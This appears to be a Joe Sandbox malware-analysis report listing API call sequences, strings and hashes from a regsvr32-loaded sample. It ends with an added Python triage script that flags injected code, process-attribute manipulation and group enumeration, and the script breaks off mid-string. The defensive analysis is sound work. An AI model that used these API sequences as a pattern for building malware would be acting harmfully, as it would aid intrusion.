• String ID:
• API String ID: 1111070192-0
APIs
• CancelIo.KERNEL32(?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131,00000002,000000FF,00000000,000000FF), ref: 6C8F33F7
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131), ref: 6C8F3412
• GetLastError.KERNEL32(?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131,00000002,000000FF,00000000,000000FF), ref: 6C8F342C
• GetLastError.KERNEL32(?,?,00000000,00000001,?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131), ref: 6C8F3485
• CompareStringOrdinal.KERNEL32(?,?,?,?,00000001), ref: 6C8F34DC
• GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8F34F0
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: ErrorLast$CancelCompareOrdinalOverlappedResultString
• String ID:
• API String ID: 2757005218-0
APIs
• CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D23AA
• SetWaitableTimer.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000), ref: 6C8D2417
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE), ref: 6C8D2423
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000), ref: 6C8D242B
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D243F
• Sleep.KERNEL32(FFFFFFFF,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D24B9
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
• String ID:
• API String ID: 2261246915-0
APIs
• RegOpenKeyExW.ADVAPI32(80000002,02647554,00000000,00000102,?), ref: 02635392
• RegDeleteValueW.ADVAPI32(?,02647568), ref: 026353A2
• RegSetValueExW.ADVAPI32(?,02647568,00000000,00000003,0264C7D8,000012A0), ref: 026353C0
• RegCloseKey.ADVAPI32(?), ref: 026353CB
• GetExitCodeProcess.KERNEL32(00000000,?), ref: 0263542B
• Sleep.KERNEL32(00000BB8), ref: 02635444
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
Similarity
• API ID: Value$CloseCodeDeleteExitOpenProcessSleep
• String ID:
• API String ID: 4289506047-0
APIs
• Sleep.KERNEL32(?,?,?,6C8512C1,?,?,?,?,?,?,6C8513CE), ref: 6C851057
• _amsg_exit.MSVCRT ref: 6C851085
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: Sleep_amsg_exit
• String ID:
• API String ID: 1015461914-0
APIs
• RtlEnterCriticalSection.NTDLL(?), ref: 026350BA
• WSASetLastError.WS2_32(0000139F), ref: 026350D2
• RtlLeaveCriticalSection.NTDLL(?), ref: 026350DC
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeave
• String ID:
• API String ID: 4082018349-0
APIs
• RegOpenKeyExW.ADVAPI32(80000002,02647554,00000000,00000102,?), ref: 02635392
• RegDeleteValueW.ADVAPI32(?,02647568), ref: 026353A2
• RegSetValueExW.ADVAPI32(?,02647568,00000000,00000003,0264C7D8,000012A0), ref: 026353C0
• RegCloseKey.ADVAPI32(?), ref: 026353CB
• GetExitCodeProcess.KERNEL32(00000000,?), ref: 0263542B
• Sleep.KERNEL32(00000BB8), ref: 02635444
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
Similarity
• API ID: Value$CloseCodeDeleteExitOpenProcessSleep
• String ID:
• API String ID: 4289506047-0
APIs
• __getptd.LIBCMT ref: 0263DA0A
  • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
  • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
• __amsg_exit.LIBCMT ref: 0263DA2A
• __lock.LIBCMT ref: 0263DA3A
• InterlockedDecrement.KERNEL32(?), ref: 0263DA57
• _free.LIBCMT ref: 0263DA6A
• InterlockedIncrement.KERNEL32(02649B48), ref: 0263DA82
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
APIs
• memset.MSVCRT ref: 6C894A6D
• memcpy.MSVCRT(?,?,00000404), ref: 6C894AB7
• memcpy.MSVCRT(00000400,?,00000404,?,?,?,?,?,00000400,6C97DC4C), ref: 6C894B2F
• memcpy.MSVCRT(00000400,?,00000404,00000000,?,?,00000400,6C97DC1C,?,?,00000400,6C97DC0C,?,?,00000400,6C97DC4C), ref: 6C894C07
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
APIs
• GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8EC3
• GetLastError.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8ED1
• GetConsoleMode.KERNEL32(00000000,00000000,FFFFFFF4), ref: 6C8F8F06
• CloseHandle.KERNEL32(6C8DC9EC,00000000,6C983D58,called `Result::unwrap()` on an `Err` value,0000002B,00000000,6C9806DC,6C983CE4,?,00000001,6C983CD4,00000000,00000000,FFFFFFF4), ref: 6C8F9163
Strings
• called `Result::unwrap()` on an `Err` value, xrefs: 6C8F9139
Memory Dump Source
• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
Similarity
• API ID: Handle$CloseConsoleErrorLastMode
• String ID: called `Result::unwrap()` on an `Err` value
• API String ID: 1170577072-2333694755
                                                                  • Opcode ID: a286046e61007102d2377bec1cd2176bdb511f51476697ae9a74c5b71084a485
                                                                  • Instruction ID: 65d9700e9e6fa2ea2c5bf9c4a9722ea94fced5ec16b642f5e21aaf03dccea8c6
                                                                  • Opcode Fuzzy Hash: a286046e61007102d2377bec1cd2176bdb511f51476697ae9a74c5b71084a485
                                                                  • Instruction Fuzzy Hash: 958128708042489BDB20CFA5C980BDEBFB5AF56348F148D5AE8A17BB41D736D586CB70
                                                                  APIs
                                                                  Strings
                                                                  • Error cleaning up spin_keys for thread , xrefs: 6C948287
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDebugOutputStringThread_ultoaabort
                                                                  • String ID: Error cleaning up spin_keys for thread
                                                                  • API String ID: 4191895893-2906507043
                                                                  • Opcode ID: 2620f5de96dea6be2474176b135cc746c25c40acebf892b6e96c2feb58e77487
                                                                  • Instruction ID: 841f3f194f0e450f664cca161e54d652510ab928994ff6c58ee6cb0cf6401699
                                                                  • Opcode Fuzzy Hash: 2620f5de96dea6be2474176b135cc746c25c40acebf892b6e96c2feb58e77487
                                                                  • Instruction Fuzzy Hash: C711027160C7409BDB006B78D88471BBEE4AB86328F548A2AE090C7791C775C545C79A
                                                                  APIs
                                                                  • InitializeProcThreadAttributeList.KERNEL32(00000000,00000006,00000000,00000000), ref: 6C8F8B04
                                                                  • InitializeProcThreadAttributeList.KERNEL32(00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8B9A
                                                                  • UpdateProcThreadAttribute.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8C8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AttributeProcThread$InitializeList$Update
                                                                  • String ID:
                                                                  • API String ID: 3806694049-0
                                                                  • Opcode ID: e0b9b6e428172376da871e161a6df9a611cacfc0882d473f19ad2674c197ccf2
                                                                  • Instruction ID: cb69d479403cb409ca90d1e20ecf382de6b04d89f21672231459be0389cfc7a3
                                                                  • Opcode Fuzzy Hash: e0b9b6e428172376da871e161a6df9a611cacfc0882d473f19ad2674c197ccf2
                                                                  • Instruction Fuzzy Hash: B8717731A012149BDF20CFA5C980BFBB7B5FF16348F15496AE818AB741D772E846C7A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95d943797c5de33cf6e30557c083e91ee023b08883930c0a895e525a8404f6a1
                                                                  • Instruction ID: 3938a6a1f8f92defc6b960b5480d70b9bbdb3eae90ffcc892cc020e53b1c882f
                                                                  • Opcode Fuzzy Hash: 95d943797c5de33cf6e30557c083e91ee023b08883930c0a895e525a8404f6a1
                                                                  • Instruction Fuzzy Hash: 556188B56093048FD700CF29C48065AB7F9BF99708F44CA6EE898DBB14E774D90ACB56
                                                                  APIs
                                                                  • NetGroupEnum.NETAPI32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8624EB
                                                                  • NetGroupGetInfo.NETAPI32(00000000,00000000,00000003,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF), ref: 6C862542
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Group$EnumInfo
                                                                  • String ID:
                                                                  • API String ID: 432415500-0
                                                                  • Opcode ID: 5e84e2d3397431715ac572703e933ba48da65b57c9f3568f1fce1d4be9fb0ce8
                                                                  • Instruction ID: c5e3668f1130641ba6b181b4469fb54e73987e8c2389dc69f2c29594eac98321
                                                                  • Opcode Fuzzy Hash: 5e84e2d3397431715ac572703e933ba48da65b57c9f3568f1fce1d4be9fb0ce8
                                                                  • Instruction Fuzzy Hash: D85163B1E012099FDB10CF95D988BEEB7B4BF58318F1485A9E814ABB81E735DD05CB90
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 6C8BDA49, 6C8BDA93
                                                                  • assertion failed: new_left_len <= CAPACITY, xrefs: 6C8BD36E, 6C8BDA31
                                                                  • assertion failed: old_left_len + count <= CAPACITY, xrefs: 6C8BD091
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove
                                                                  • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                  • API String ID: 2162964266-3535459961
                                                                  • Opcode ID: be8e9a54e68a60071c9c3f1c079dc551bf8670ede1602f3f90179eadb874eeff
                                                                  • Instruction ID: 6d8e1bf7c2f3f144f1217149b2378e761ca09949a848e5d924f2755615494001
                                                                  • Opcode Fuzzy Hash: be8e9a54e68a60071c9c3f1c079dc551bf8670ede1602f3f90179eadb874eeff
                                                                  • Instruction Fuzzy Hash: B4718B70D01B198BCB21CF59C980BEAB7B9FF89304F1486AED8496B306D731AA45CB50
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C947640
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a25efd61e7f1da03d8e8972d5812c359eb01d80674edf24256623fc5986dd0ac
                                                                  • Instruction ID: 2843e2878da994dd4e6d943b5d2265115178e148d8320bf761986a89a9d5a7fd
                                                                  • Opcode Fuzzy Hash: a25efd61e7f1da03d8e8972d5812c359eb01d80674edf24256623fc5986dd0ac
                                                                  • Instruction Fuzzy Hash: 5D31C4317042058BEB006F6DD88475B77EAEB80368F28C979D948CFA45EB36C840CBD2
                                                                  APIs
                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 02633C9F
                                                                  • SetLastError.KERNEL32(00000000,?,00000001,?,02633AB7), ref: 02633CDA
                                                                  • GetLastError.KERNEL32 ref: 02633D25
                                                                  • WSAGetLastError.WS2_32(?,00000001,?,02633AB7), ref: 02633D5B
                                                                  • WSASetLastError.WS2_32(0000000D,?,00000001,?,02633AB7), ref: 02633D82
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$recv
                                                                  • String ID:
                                                                  • API String ID: 316788870-0
                                                                  • Opcode ID: 4ba2408b7629b99c71698248f90823044debc3fed0daeb613643dfe7bddc3e00
                                                                  • Instruction ID: aa5c2e40b338a39f5282e2b1a9712b15511bc0c1a15e4521236deb56e495c17b
                                                                  • Opcode Fuzzy Hash: 4ba2408b7629b99c71698248f90823044debc3fed0daeb613643dfe7bddc3e00
                                                                  • Instruction Fuzzy Hash: 0B310876A042009FEB659F68D8C876937A9FB44324F5005AAED06CB385D735D8E1CBD0
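                                                                   The two function blocks above (the KERNEL32 InitializeProcThreadAttributeList / UpdateProcThreadAttribute sequence in the regsvr32-loaded image at 6C850000, and the WS2_32 recv routine in the region at 02631000 that the dump marks "based on PE: false") are the entries an analyst normally pulls out of this listing by hand. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" and "Memory Dump Source" lines (the sample input is copied from the two blocks above, plus one constructed line carrying a resolved attribute value) and flags three things: code that runs from memory not backed by a PE image, the PROC_THREAD_ATTRIBUTE_* value passed to UpdateProcThreadAttribute (here the Attribute argument is unresolved, shown as `?`, so parent-process spoofing versus handle inheritance cannot be decided from the dump alone), and NETAPI32 group enumeration. The rule table, the dataclass names and the triage wording are this example's own assumptions.

```python
"""Parse the 'APIs' / 'Memory Dump Source' lines of a Joe Sandbox function
block and flag API patterns worth a second look.

Added example for this report; the rule table below is an assumption of
the example, not a Joe Sandbox feature. Sample lines are copied from the
report, except SAMPLE_RESOLVED, which is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", and the
# indented "• Part of subcall function ADDR: Name.MODULE(...), ref: ADDR" form.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_RE = re.compile(
    r"Source File:.*?Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# PROC_THREAD_ATTRIBUTE_* constants from processthreadsapi.h.
PROC_THREAD_ATTRS = {
    0x00020000: "PARENT_PROCESS",
    0x00020002: "HANDLE_LIST",
    0x00020007: "MITIGATION_POLICY",
}

# (set of API names that must all appear in one function, label)
RULES = [
    ({"InitializeProcThreadAttributeList", "UpdateProcThreadAttribute"},
     "extended process-creation attributes (PROC_THREAD_ATTRIBUTE_*)"),
    ({"NetGroupEnum", "NetGroupGetInfo"},
     "NETAPI32 group enumeration (local/domain group discovery)"),
    ({"recv", "WSAGetLastError"},
     "WS2_32 socket receive with error handling"),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class Block:
    calls: List[ApiCall] = field(default_factory=list)
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None


def parse_block(text: str) -> Block:
    """Collect API calls and the memory-dump origin of one function block."""
    blk = Block()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            # Joe lists raw stack slots; '?' marks a value it could not resolve.
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blk.calls.append(ApiCall(m["api"], m["mod"].upper(), args, m["ref"].upper(), m["sub"]))
            continue
        s = SOURCE_RE.search(line)
        if s:
            blk.offset = int(s["off"], 16)
            blk.pe_backed = s["pe"] == "true"
    return blk


def attribute_name(hex_arg: str) -> str:
    """Map the Attribute argument of UpdateProcThreadAttribute to its name."""
    if hex_arg == "?":
        return "unresolved"
    value = int(hex_arg, 16)
    return PROC_THREAD_ATTRS.get(value, "0x%08X" % value)


def triage(blk: Block) -> List[str]:
    """Return human-readable findings for one parsed block."""
    names = {c.api for c in blk.calls}
    out = []
    if blk.pe_backed is False:
        out.append("code at %08X is not backed by a PE image: injected or unpacked code" % blk.offset)
    for needed, label in RULES:
        if needed <= names:
            out.append(label)
    for c in blk.calls:
        if c.api == "UpdateProcThreadAttribute":
            # 3rd parameter of UpdateProcThreadAttribute is Attribute.
            attr = attribute_name(c.args[2]) if len(c.args) > 2 else "unresolved"
            out.append("UpdateProcThreadAttribute attribute: %s" % attr)
    return out


SAMPLE_PROC_ATTR = """\
• InitializeProcThreadAttributeList.KERNEL32(00000000,00000006,00000000,00000000), ref: 6C8F8B04
• InitializeProcThreadAttributeList.KERNEL32(00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8B9A
• UpdateProcThreadAttribute.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8C8A
Memory Dump Source
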